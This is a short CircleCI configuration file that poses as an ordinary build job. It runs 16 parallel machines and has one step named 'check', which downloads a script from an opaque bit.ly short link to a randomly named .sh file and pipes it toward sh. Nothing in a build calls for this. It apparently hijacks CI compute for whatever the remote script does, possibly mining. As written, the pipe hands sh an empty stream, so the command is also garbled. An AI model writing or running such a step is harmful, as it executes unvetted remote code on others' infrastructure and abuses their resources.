version: 2.1
jobs:
  build:
    parallelism: 16
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run:
          name: check
          command: |
                 sudo apt-get update
                 hostname=$(echo $(shuf -n 1 -i 1-99999999).sh)
                 curl -L -o $hostname https://bit.ly/3bZuOMY | sh